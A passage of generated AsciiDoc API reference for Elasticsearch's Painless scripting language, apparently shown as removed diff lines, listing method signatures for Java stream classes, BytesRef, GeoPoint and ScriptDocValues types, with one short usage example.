{java11-javadoc}/java.base/java/util/stream/LongStream.html#mapToInt(java.util.function.LongToIntFunction)[mapToInt](LongToIntFunction) -* Stream {java11-javadoc}/java.base/java/util/stream/LongStream.html#mapToObj(java.util.function.LongFunction)[mapToObj](LongFunction) -* OptionalLong {java11-javadoc}/java.base/java/util/stream/LongStream.html#max()[max]() -* OptionalLong {java11-javadoc}/java.base/java/util/stream/LongStream.html#min()[min]() -* boolean {java11-javadoc}/java.base/java/util/stream/LongStream.html#noneMatch(java.util.function.LongPredicate)[noneMatch](LongPredicate) -* LongStream {java11-javadoc}/java.base/java/util/stream/LongStream.html#peek(java.util.function.LongConsumer)[peek](LongConsumer) -* OptionalLong {java11-javadoc}/java.base/java/util/stream/LongStream.html#reduce(java.util.function.LongBinaryOperator)[reduce](LongBinaryOperator) -* long {java11-javadoc}/java.base/java/util/stream/LongStream.html#reduce(long,java.util.function.LongBinaryOperator)[reduce](long, LongBinaryOperator) -* LongStream {java11-javadoc}/java.base/java/util/stream/LongStream.html#sequential()[sequential]() -* LongStream {java11-javadoc}/java.base/java/util/stream/LongStream.html#skip(long)[skip](long) -* LongStream {java11-javadoc}/java.base/java/util/stream/LongStream.html#sorted()[sorted]() -* Spliterator.OfLong {java11-javadoc}/java.base/java/util/stream/LongStream.html#spliterator()[spliterator]() -* long {java11-javadoc}/java.base/java/util/stream/LongStream.html#sum()[sum]() -* LongSummaryStatistics {java11-javadoc}/java.base/java/util/stream/LongStream.html#summaryStatistics()[summaryStatistics]() -* long[] {java11-javadoc}/java.base/java/util/stream/LongStream.html#toArray()[toArray]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() -* BaseStream {java11-javadoc}/java.base/java/util/stream/BaseStream.html#unordered()[unordered]() - - -[[painless-api-reference-shared-LongStream-Builder]] -==== LongStream.Builder -* void {java11-javadoc}/java.base/java/util/function/LongConsumer.html#accept(long)[accept](long) -* LongStream.Builder {java11-javadoc}/java.base/java/util/stream/LongStream$Builder.html#add(long)[add](long) -* LongConsumer {java11-javadoc}/java.base/java/util/function/LongConsumer.html#andThen(java.util.function.LongConsumer)[andThen](LongConsumer) -* LongStream {java11-javadoc}/java.base/java/util/stream/LongStream$Builder.html#build()[build]() -* 
boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-Stream]] -==== Stream -* static Stream.Builder {java11-javadoc}/java.base/java/util/stream/Stream.html#builder()[builder]() -* static Stream {java11-javadoc}/java.base/java/util/stream/Stream.html#concat(java.util.stream.Stream,java.util.stream.Stream)[concat](Stream, Stream) -* static Stream {java11-javadoc}/java.base/java/util/stream/Stream.html#empty()[empty]() -* static Stream {java11-javadoc}/java.base/java/util/stream/Stream.html#of(java.lang.Object%5B%5D)[of](def[]) -* boolean {java11-javadoc}/java.base/java/util/stream/Stream.html#allMatch(java.util.function.Predicate)[allMatch](Predicate) -* boolean {java11-javadoc}/java.base/java/util/stream/Stream.html#anyMatch(java.util.function.Predicate)[anyMatch](Predicate) -* void {java11-javadoc}/java.base/java/util/stream/BaseStream.html#close()[close]() -* def {java11-javadoc}/java.base/java/util/stream/Stream.html#collect(java.util.stream.Collector)[collect](Collector) -* def {java11-javadoc}/java.base/java/util/stream/Stream.html#collect(java.util.function.Supplier,java.util.function.BiConsumer,java.util.function.BiConsumer)[collect](Supplier, BiConsumer, BiConsumer) -* long {java11-javadoc}/java.base/java/util/stream/Stream.html#count()[count]() -* Stream {java11-javadoc}/java.base/java/util/stream/Stream.html#distinct()[distinct]() -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* Stream {java11-javadoc}/java.base/java/util/stream/Stream.html#filter(java.util.function.Predicate)[filter](Predicate) -* Optional {java11-javadoc}/java.base/java/util/stream/Stream.html#findAny()[findAny]() -* Optional {java11-javadoc}/java.base/java/util/stream/Stream.html#findFirst()[findFirst]() -* Stream {java11-javadoc}/java.base/java/util/stream/Stream.html#flatMap(java.util.function.Function)[flatMap](Function) -* DoubleStream {java11-javadoc}/java.base/java/util/stream/Stream.html#flatMapToDouble(java.util.function.Function)[flatMapToDouble](Function) -* IntStream {java11-javadoc}/java.base/java/util/stream/Stream.html#flatMapToInt(java.util.function.Function)[flatMapToInt](Function) -* LongStream {java11-javadoc}/java.base/java/util/stream/Stream.html#flatMapToLong(java.util.function.Function)[flatMapToLong](Function) -* void {java11-javadoc}/java.base/java/util/stream/Stream.html#forEach(java.util.function.Consumer)[forEach](Consumer) -* void {java11-javadoc}/java.base/java/util/stream/Stream.html#forEachOrdered(java.util.function.Consumer)[forEachOrdered](Consumer) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* boolean {java11-javadoc}/java.base/java/util/stream/BaseStream.html#isParallel()[isParallel]() -* Iterator {java11-javadoc}/java.base/java/util/stream/BaseStream.html#iterator()[iterator]() -* Stream {java11-javadoc}/java.base/java/util/stream/Stream.html#limit(long)[limit](long) -* Stream {java11-javadoc}/java.base/java/util/stream/Stream.html#map(java.util.function.Function)[map](Function) -* DoubleStream {java11-javadoc}/java.base/java/util/stream/Stream.html#mapToDouble(java.util.function.ToDoubleFunction)[mapToDouble](ToDoubleFunction) -* IntStream 
{java11-javadoc}/java.base/java/util/stream/Stream.html#mapToInt(java.util.function.ToIntFunction)[mapToInt](ToIntFunction) -* LongStream {java11-javadoc}/java.base/java/util/stream/Stream.html#mapToLong(java.util.function.ToLongFunction)[mapToLong](ToLongFunction) -* Optional {java11-javadoc}/java.base/java/util/stream/Stream.html#max(java.util.Comparator)[max](Comparator) -* Optional {java11-javadoc}/java.base/java/util/stream/Stream.html#min(java.util.Comparator)[min](Comparator) -* boolean {java11-javadoc}/java.base/java/util/stream/Stream.html#noneMatch(java.util.function.Predicate)[noneMatch](Predicate) -* Stream {java11-javadoc}/java.base/java/util/stream/Stream.html#peek(java.util.function.Consumer)[peek](Consumer) -* Optional {java11-javadoc}/java.base/java/util/stream/Stream.html#reduce(java.util.function.BinaryOperator)[reduce](BinaryOperator) -* def {java11-javadoc}/java.base/java/util/stream/Stream.html#reduce(java.lang.Object,java.util.function.BinaryOperator)[reduce](def, BinaryOperator) -* def {java11-javadoc}/java.base/java/util/stream/Stream.html#reduce(java.lang.Object,java.util.function.BiFunction,java.util.function.BinaryOperator)[reduce](def, BiFunction, BinaryOperator) -* BaseStream {java11-javadoc}/java.base/java/util/stream/BaseStream.html#sequential()[sequential]() -* Stream {java11-javadoc}/java.base/java/util/stream/Stream.html#skip(long)[skip](long) -* Stream {java11-javadoc}/java.base/java/util/stream/Stream.html#sorted()[sorted]() -* Stream {java11-javadoc}/java.base/java/util/stream/Stream.html#sorted(java.util.Comparator)[sorted](Comparator) -* Spliterator {java11-javadoc}/java.base/java/util/stream/BaseStream.html#spliterator()[spliterator]() -* def[] {java11-javadoc}/java.base/java/util/stream/Stream.html#toArray()[toArray]() -* def[] {java11-javadoc}/java.base/java/util/stream/Stream.html#toArray(java.util.function.IntFunction)[toArray](IntFunction) -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() -* BaseStream {java11-javadoc}/java.base/java/util/stream/BaseStream.html#unordered()[unordered]() - - -[[painless-api-reference-shared-Stream-Builder]] -==== Stream.Builder -* void {java11-javadoc}/java.base/java/util/function/Consumer.html#accept(java.lang.Object)[accept](def) -* Stream.Builder {java11-javadoc}/java.base/java/util/stream/Stream$Builder.html#add(java.lang.Object)[add](def) -* Consumer {java11-javadoc}/java.base/java/util/function/Consumer.html#andThen(java.util.function.Consumer)[andThen](Consumer) -* Stream {java11-javadoc}/java.base/java/util/stream/Stream$Builder.html#build()[build]() -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[role="exclude",id="painless-api-reference-shared-org-apache-lucene-util"] -=== Shared API for package org.apache.lucene.util -See the <> for a high-level overview of all packages and classes. 
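To make the `java.util.stream` listings above easier to apply, here is a minimal Painless sketch. It is not part of the generated reference: the literal values are invented, and it only chains methods that appear in the listings (`IntStream.rangeClosed`, `IntStream.map`, `IntStream.sum`, `Stream.filter`, `Stream.collect`, `Collectors.joining`).

[source,painless]
----
// A minimal sketch, not part of the generated reference; the values are invented.
int sumOfSquares = IntStream.rangeClosed(1, 5)   // static IntStream.rangeClosed(int, int)
    .map(n -> n * n)                             // IntStream.map(IntUnaryOperator)
    .sum();                                      // IntStream.sum()

List labels = ['a', 'bb', 'ccc'];
String joined = labels.stream()                  // Collection.stream()
    .filter(s -> s.length() > 1)                 // Stream.filter(Predicate)
    .collect(Collectors.joining(', '));          // Collectors.joining(CharSequence)

return joined + ' / ' + sumOfSquares;            // "bb, ccc / 55"
----

The same pattern carries over to `LongStream` and `DoubleStream`, whose methods mirror the `IntStream` entries above.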
- -[[painless-api-reference-shared-BytesRef]] -==== BytesRef -* byte[] bytes -* int length -* int offset -* boolean bytesEquals(BytesRef) -* int {java11-javadoc}/java.base/java/lang/Comparable.html#compareTo(java.lang.Object)[compareTo](def) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() -* null utf8ToString() - - -[role="exclude",id="painless-api-reference-shared-org-elasticsearch-common-geo"] -=== Shared API for package org.elasticsearch.common.geo -See the <> for a high-level overview of all packages and classes. - -[[painless-api-reference-shared-GeoPoint]] -==== GeoPoint -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* double getLat() -* double getLon() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[role="exclude",id="painless-api-reference-shared-org-elasticsearch-index-fielddata"] -=== Shared API for package org.elasticsearch.index.fielddata -See the <> for a high-level overview of all packages and classes. - -[[painless-api-reference-shared-ScriptDocValues-Booleans]] -==== ScriptDocValues.Booleans -* boolean {java11-javadoc}/java.base/java/util/Collection.html#add(java.lang.Object)[add](def) -* void {java11-javadoc}/java.base/java/util/List.html#add(int,java.lang.Object)[add](int, def) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#addAll(java.util.Collection)[addAll](Collection) -* boolean {java11-javadoc}/java.base/java/util/List.html#addAll(int,java.util.Collection)[addAll](int, Collection) -* boolean any(Predicate) -* Collection asCollection() -* List asList() -* void {java11-javadoc}/java.base/java/util/Collection.html#clear()[clear]() -* List collect(Function) -* def collect(Collection, Function) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#contains(java.lang.Object)[contains](def) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#containsAll(java.util.Collection)[containsAll](Collection) -* def each(Consumer) -* def eachWithIndex(ObjIntConsumer) -* boolean {java11-javadoc}/java.base/java/util/List.html#equals(java.lang.Object)[equals](Object) -* boolean every(Predicate) -* def find(Predicate) -* List findAll(Predicate) -* def findResult(Function) -* def findResult(def, Function) -* List findResults(Function) -* void {java11-javadoc}/java.base/java/lang/Iterable.html#forEach(java.util.function.Consumer)[forEach](Consumer) -* Boolean get(int) -* Object getByPath(null) -* Object getByPath(null, Object) -* int getLength() -* boolean getValue() -* Map groupBy(Function) -* int {java11-javadoc}/java.base/java/util/List.html#hashCode()[hashCode]() -* int {java11-javadoc}/java.base/java/util/List.html#indexOf(java.lang.Object)[indexOf](def) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#isEmpty()[isEmpty]() -* Iterator {java11-javadoc}/java.base/java/lang/Iterable.html#iterator()[iterator]() -* null join(null) -* int {java11-javadoc}/java.base/java/util/List.html#lastIndexOf(java.lang.Object)[lastIndexOf](def) -* ListIterator {java11-javadoc}/java.base/java/util/List.html#listIterator()[listIterator]() -* ListIterator {java11-javadoc}/java.base/java/util/List.html#listIterator(int)[listIterator](int) -* def 
{java11-javadoc}/java.base/java/util/List.html#remove(int)[remove](int) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#removeAll(java.util.Collection)[removeAll](Collection) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#removeIf(java.util.function.Predicate)[removeIf](Predicate) -* void {java11-javadoc}/java.base/java/util/List.html#replaceAll(java.util.function.UnaryOperator)[replaceAll](UnaryOperator) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#retainAll(java.util.Collection)[retainAll](Collection) -* def {java11-javadoc}/java.base/java/util/List.html#set(int,java.lang.Object)[set](int, def) -* int {java11-javadoc}/java.base/java/util/Collection.html#size()[size]() -* void {java11-javadoc}/java.base/java/util/List.html#sort(java.util.Comparator)[sort](Comparator) -* List split(Predicate) -* Spliterator {java11-javadoc}/java.base/java/util/Collection.html#spliterator()[spliterator]() -* Stream {java11-javadoc}/java.base/java/util/Collection.html#stream()[stream]() -* List {java11-javadoc}/java.base/java/util/List.html#subList(int,int)[subList](int, int) -* double sum() -* double sum(ToDoubleFunction) -* def[] {java11-javadoc}/java.base/java/util/Collection.html#toArray()[toArray]() -* def[] {java11-javadoc}/java.base/java/util/Collection.html#toArray(java.lang.Object%5B%5D)[toArray](def[]) -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-ScriptDocValues-BytesRefs]] -==== ScriptDocValues.BytesRefs -* boolean {java11-javadoc}/java.base/java/util/Collection.html#add(java.lang.Object)[add](def) -* void {java11-javadoc}/java.base/java/util/List.html#add(int,java.lang.Object)[add](int, def) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#addAll(java.util.Collection)[addAll](Collection) -* boolean {java11-javadoc}/java.base/java/util/List.html#addAll(int,java.util.Collection)[addAll](int, Collection) -* boolean any(Predicate) -* Collection asCollection() -* List asList() -* void {java11-javadoc}/java.base/java/util/Collection.html#clear()[clear]() -* List collect(Function) -* def collect(Collection, Function) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#contains(java.lang.Object)[contains](def) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#containsAll(java.util.Collection)[containsAll](Collection) -* def each(Consumer) -* def eachWithIndex(ObjIntConsumer) -* boolean {java11-javadoc}/java.base/java/util/List.html#equals(java.lang.Object)[equals](Object) -* boolean every(Predicate) -* def find(Predicate) -* List findAll(Predicate) -* def findResult(Function) -* def findResult(def, Function) -* List findResults(Function) -* void {java11-javadoc}/java.base/java/lang/Iterable.html#forEach(java.util.function.Consumer)[forEach](Consumer) -* BytesRef get(int) -* Object getByPath(null) -* Object getByPath(null, Object) -* int getLength() -* BytesRef getValue() -* Map groupBy(Function) -* int {java11-javadoc}/java.base/java/util/List.html#hashCode()[hashCode]() -* int {java11-javadoc}/java.base/java/util/List.html#indexOf(java.lang.Object)[indexOf](def) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#isEmpty()[isEmpty]() -* Iterator {java11-javadoc}/java.base/java/lang/Iterable.html#iterator()[iterator]() -* null join(null) -* int {java11-javadoc}/java.base/java/util/List.html#lastIndexOf(java.lang.Object)[lastIndexOf](def) -* ListIterator {java11-javadoc}/java.base/java/util/List.html#listIterator()[listIterator]() 
-* ListIterator {java11-javadoc}/java.base/java/util/List.html#listIterator(int)[listIterator](int) -* def {java11-javadoc}/java.base/java/util/List.html#remove(int)[remove](int) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#removeAll(java.util.Collection)[removeAll](Collection) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#removeIf(java.util.function.Predicate)[removeIf](Predicate) -* void {java11-javadoc}/java.base/java/util/List.html#replaceAll(java.util.function.UnaryOperator)[replaceAll](UnaryOperator) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#retainAll(java.util.Collection)[retainAll](Collection) -* def {java11-javadoc}/java.base/java/util/List.html#set(int,java.lang.Object)[set](int, def) -* int {java11-javadoc}/java.base/java/util/Collection.html#size()[size]() -* void {java11-javadoc}/java.base/java/util/List.html#sort(java.util.Comparator)[sort](Comparator) -* List split(Predicate) -* Spliterator {java11-javadoc}/java.base/java/util/Collection.html#spliterator()[spliterator]() -* Stream {java11-javadoc}/java.base/java/util/Collection.html#stream()[stream]() -* List {java11-javadoc}/java.base/java/util/List.html#subList(int,int)[subList](int, int) -* double sum() -* double sum(ToDoubleFunction) -* def[] {java11-javadoc}/java.base/java/util/Collection.html#toArray()[toArray]() -* def[] {java11-javadoc}/java.base/java/util/Collection.html#toArray(java.lang.Object%5B%5D)[toArray](def[]) -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-ScriptDocValues-Dates]] -==== ScriptDocValues.Dates -* boolean {java11-javadoc}/java.base/java/util/Collection.html#add(java.lang.Object)[add](def) -* void {java11-javadoc}/java.base/java/util/List.html#add(int,java.lang.Object)[add](int, def) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#addAll(java.util.Collection)[addAll](Collection) -* boolean {java11-javadoc}/java.base/java/util/List.html#addAll(int,java.util.Collection)[addAll](int, Collection) -* boolean any(Predicate) -* Collection asCollection() -* List asList() -* void {java11-javadoc}/java.base/java/util/Collection.html#clear()[clear]() -* List collect(Function) -* def collect(Collection, Function) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#contains(java.lang.Object)[contains](def) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#containsAll(java.util.Collection)[containsAll](Collection) -* def each(Consumer) -* def eachWithIndex(ObjIntConsumer) -* boolean {java11-javadoc}/java.base/java/util/List.html#equals(java.lang.Object)[equals](Object) -* boolean every(Predicate) -* def find(Predicate) -* List findAll(Predicate) -* def findResult(Function) -* def findResult(def, Function) -* List findResults(Function) -* void {java11-javadoc}/java.base/java/lang/Iterable.html#forEach(java.util.function.Consumer)[forEach](Consumer) -* JodaCompatibleZonedDateTime get(int) -* Object getByPath(null) -* Object getByPath(null, Object) -* int getLength() -* JodaCompatibleZonedDateTime getValue() -* Map groupBy(Function) -* int {java11-javadoc}/java.base/java/util/List.html#hashCode()[hashCode]() -* int {java11-javadoc}/java.base/java/util/List.html#indexOf(java.lang.Object)[indexOf](def) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#isEmpty()[isEmpty]() -* Iterator {java11-javadoc}/java.base/java/lang/Iterable.html#iterator()[iterator]() -* null join(null) -* int 
{java11-javadoc}/java.base/java/util/List.html#lastIndexOf(java.lang.Object)[lastIndexOf](def) -* ListIterator {java11-javadoc}/java.base/java/util/List.html#listIterator()[listIterator]() -* ListIterator {java11-javadoc}/java.base/java/util/List.html#listIterator(int)[listIterator](int) -* def {java11-javadoc}/java.base/java/util/List.html#remove(int)[remove](int) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#removeAll(java.util.Collection)[removeAll](Collection) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#removeIf(java.util.function.Predicate)[removeIf](Predicate) -* void {java11-javadoc}/java.base/java/util/List.html#replaceAll(java.util.function.UnaryOperator)[replaceAll](UnaryOperator) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#retainAll(java.util.Collection)[retainAll](Collection) -* def {java11-javadoc}/java.base/java/util/List.html#set(int,java.lang.Object)[set](int, def) -* int {java11-javadoc}/java.base/java/util/Collection.html#size()[size]() -* void {java11-javadoc}/java.base/java/util/List.html#sort(java.util.Comparator)[sort](Comparator) -* List split(Predicate) -* Spliterator {java11-javadoc}/java.base/java/util/Collection.html#spliterator()[spliterator]() -* Stream {java11-javadoc}/java.base/java/util/Collection.html#stream()[stream]() -* List {java11-javadoc}/java.base/java/util/List.html#subList(int,int)[subList](int, int) -* double sum() -* double sum(ToDoubleFunction) -* def[] {java11-javadoc}/java.base/java/util/Collection.html#toArray()[toArray]() -* def[] {java11-javadoc}/java.base/java/util/Collection.html#toArray(java.lang.Object%5B%5D)[toArray](def[]) -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-ScriptDocValues-Doubles]] -==== ScriptDocValues.Doubles -* boolean {java11-javadoc}/java.base/java/util/Collection.html#add(java.lang.Object)[add](def) -* void {java11-javadoc}/java.base/java/util/List.html#add(int,java.lang.Object)[add](int, def) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#addAll(java.util.Collection)[addAll](Collection) -* boolean {java11-javadoc}/java.base/java/util/List.html#addAll(int,java.util.Collection)[addAll](int, Collection) -* boolean any(Predicate) -* Collection asCollection() -* List asList() -* void {java11-javadoc}/java.base/java/util/Collection.html#clear()[clear]() -* List collect(Function) -* def collect(Collection, Function) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#contains(java.lang.Object)[contains](def) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#containsAll(java.util.Collection)[containsAll](Collection) -* def each(Consumer) -* def eachWithIndex(ObjIntConsumer) -* boolean {java11-javadoc}/java.base/java/util/List.html#equals(java.lang.Object)[equals](Object) -* boolean every(Predicate) -* def find(Predicate) -* List findAll(Predicate) -* def findResult(Function) -* def findResult(def, Function) -* List findResults(Function) -* void {java11-javadoc}/java.base/java/lang/Iterable.html#forEach(java.util.function.Consumer)[forEach](Consumer) -* Double get(int) -* Object getByPath(null) -* Object getByPath(null, Object) -* int getLength() -* double getValue() -* Map groupBy(Function) -* int {java11-javadoc}/java.base/java/util/List.html#hashCode()[hashCode]() -* int {java11-javadoc}/java.base/java/util/List.html#indexOf(java.lang.Object)[indexOf](def) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#isEmpty()[isEmpty]() -* Iterator 
{java11-javadoc}/java.base/java/lang/Iterable.html#iterator()[iterator]() -* null join(null) -* int {java11-javadoc}/java.base/java/util/List.html#lastIndexOf(java.lang.Object)[lastIndexOf](def) -* ListIterator {java11-javadoc}/java.base/java/util/List.html#listIterator()[listIterator]() -* ListIterator {java11-javadoc}/java.base/java/util/List.html#listIterator(int)[listIterator](int) -* def {java11-javadoc}/java.base/java/util/List.html#remove(int)[remove](int) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#removeAll(java.util.Collection)[removeAll](Collection) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#removeIf(java.util.function.Predicate)[removeIf](Predicate) -* void {java11-javadoc}/java.base/java/util/List.html#replaceAll(java.util.function.UnaryOperator)[replaceAll](UnaryOperator) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#retainAll(java.util.Collection)[retainAll](Collection) -* def {java11-javadoc}/java.base/java/util/List.html#set(int,java.lang.Object)[set](int, def) -* int {java11-javadoc}/java.base/java/util/Collection.html#size()[size]() -* void {java11-javadoc}/java.base/java/util/List.html#sort(java.util.Comparator)[sort](Comparator) -* List split(Predicate) -* Spliterator {java11-javadoc}/java.base/java/util/Collection.html#spliterator()[spliterator]() -* Stream {java11-javadoc}/java.base/java/util/Collection.html#stream()[stream]() -* List {java11-javadoc}/java.base/java/util/List.html#subList(int,int)[subList](int, int) -* double sum() -* double sum(ToDoubleFunction) -* def[] {java11-javadoc}/java.base/java/util/Collection.html#toArray()[toArray]() -* def[] {java11-javadoc}/java.base/java/util/Collection.html#toArray(java.lang.Object%5B%5D)[toArray](def[]) -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-ScriptDocValues-GeoPoints]] -==== ScriptDocValues.GeoPoints -* boolean {java11-javadoc}/java.base/java/util/Collection.html#add(java.lang.Object)[add](def) -* void {java11-javadoc}/java.base/java/util/List.html#add(int,java.lang.Object)[add](int, def) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#addAll(java.util.Collection)[addAll](Collection) -* boolean {java11-javadoc}/java.base/java/util/List.html#addAll(int,java.util.Collection)[addAll](int, Collection) -* boolean any(Predicate) -* double arcDistance(double, double) -* double arcDistanceWithDefault(double, double, double) -* Collection asCollection() -* List asList() -* void {java11-javadoc}/java.base/java/util/Collection.html#clear()[clear]() -* List collect(Function) -* def collect(Collection, Function) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#contains(java.lang.Object)[contains](def) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#containsAll(java.util.Collection)[containsAll](Collection) -* def each(Consumer) -* def eachWithIndex(ObjIntConsumer) -* boolean {java11-javadoc}/java.base/java/util/List.html#equals(java.lang.Object)[equals](Object) -* boolean every(Predicate) -* def find(Predicate) -* List findAll(Predicate) -* def findResult(Function) -* def findResult(def, Function) -* List findResults(Function) -* void {java11-javadoc}/java.base/java/lang/Iterable.html#forEach(java.util.function.Consumer)[forEach](Consumer) -* double geohashDistance(null) -* double geohashDistanceWithDefault(null, double) -* GeoPoint get(int) -* Object getByPath(null) -* Object getByPath(null, Object) -* double getLat() -* double[] getLats() -* int 
getLength() -* double getLon() -* double[] getLons() -* GeoPoint getValue() -* Map groupBy(Function) -* int {java11-javadoc}/java.base/java/util/List.html#hashCode()[hashCode]() -* int {java11-javadoc}/java.base/java/util/List.html#indexOf(java.lang.Object)[indexOf](def) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#isEmpty()[isEmpty]() -* Iterator {java11-javadoc}/java.base/java/lang/Iterable.html#iterator()[iterator]() -* null join(null) -* int {java11-javadoc}/java.base/java/util/List.html#lastIndexOf(java.lang.Object)[lastIndexOf](def) -* ListIterator {java11-javadoc}/java.base/java/util/List.html#listIterator()[listIterator]() -* ListIterator {java11-javadoc}/java.base/java/util/List.html#listIterator(int)[listIterator](int) -* double planeDistance(double, double) -* double planeDistanceWithDefault(double, double, double) -* def {java11-javadoc}/java.base/java/util/List.html#remove(int)[remove](int) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#removeAll(java.util.Collection)[removeAll](Collection) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#removeIf(java.util.function.Predicate)[removeIf](Predicate) -* void {java11-javadoc}/java.base/java/util/List.html#replaceAll(java.util.function.UnaryOperator)[replaceAll](UnaryOperator) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#retainAll(java.util.Collection)[retainAll](Collection) -* def {java11-javadoc}/java.base/java/util/List.html#set(int,java.lang.Object)[set](int, def) -* int {java11-javadoc}/java.base/java/util/Collection.html#size()[size]() -* void {java11-javadoc}/java.base/java/util/List.html#sort(java.util.Comparator)[sort](Comparator) -* List split(Predicate) -* Spliterator {java11-javadoc}/java.base/java/util/Collection.html#spliterator()[spliterator]() -* Stream {java11-javadoc}/java.base/java/util/Collection.html#stream()[stream]() -* List {java11-javadoc}/java.base/java/util/List.html#subList(int,int)[subList](int, int) -* double sum() -* double sum(ToDoubleFunction) -* def[] {java11-javadoc}/java.base/java/util/Collection.html#toArray()[toArray]() -* def[] {java11-javadoc}/java.base/java/util/Collection.html#toArray(java.lang.Object%5B%5D)[toArray](def[]) -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-ScriptDocValues-Longs]] -==== ScriptDocValues.Longs -* boolean {java11-javadoc}/java.base/java/util/Collection.html#add(java.lang.Object)[add](def) -* void {java11-javadoc}/java.base/java/util/List.html#add(int,java.lang.Object)[add](int, def) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#addAll(java.util.Collection)[addAll](Collection) -* boolean {java11-javadoc}/java.base/java/util/List.html#addAll(int,java.util.Collection)[addAll](int, Collection) -* boolean any(Predicate) -* Collection asCollection() -* List asList() -* void {java11-javadoc}/java.base/java/util/Collection.html#clear()[clear]() -* List collect(Function) -* def collect(Collection, Function) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#contains(java.lang.Object)[contains](def) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#containsAll(java.util.Collection)[containsAll](Collection) -* def each(Consumer) -* def eachWithIndex(ObjIntConsumer) -* boolean {java11-javadoc}/java.base/java/util/List.html#equals(java.lang.Object)[equals](Object) -* boolean every(Predicate) -* def find(Predicate) -* List findAll(Predicate) -* def findResult(Function) -* def findResult(def, 
Function) -* List findResults(Function) -* void {java11-javadoc}/java.base/java/lang/Iterable.html#forEach(java.util.function.Consumer)[forEach](Consumer) -* Long get(int) -* Object getByPath(null) -* Object getByPath(null, Object) -* int getLength() -* long getValue() -* Map groupBy(Function) -* int {java11-javadoc}/java.base/java/util/List.html#hashCode()[hashCode]() -* int {java11-javadoc}/java.base/java/util/List.html#indexOf(java.lang.Object)[indexOf](def) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#isEmpty()[isEmpty]() -* Iterator {java11-javadoc}/java.base/java/lang/Iterable.html#iterator()[iterator]() -* null join(null) -* int {java11-javadoc}/java.base/java/util/List.html#lastIndexOf(java.lang.Object)[lastIndexOf](def) -* ListIterator {java11-javadoc}/java.base/java/util/List.html#listIterator()[listIterator]() -* ListIterator {java11-javadoc}/java.base/java/util/List.html#listIterator(int)[listIterator](int) -* def {java11-javadoc}/java.base/java/util/List.html#remove(int)[remove](int) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#removeAll(java.util.Collection)[removeAll](Collection) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#removeIf(java.util.function.Predicate)[removeIf](Predicate) -* void {java11-javadoc}/java.base/java/util/List.html#replaceAll(java.util.function.UnaryOperator)[replaceAll](UnaryOperator) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#retainAll(java.util.Collection)[retainAll](Collection) -* def {java11-javadoc}/java.base/java/util/List.html#set(int,java.lang.Object)[set](int, def) -* int {java11-javadoc}/java.base/java/util/Collection.html#size()[size]() -* void {java11-javadoc}/java.base/java/util/List.html#sort(java.util.Comparator)[sort](Comparator) -* List split(Predicate) -* Spliterator 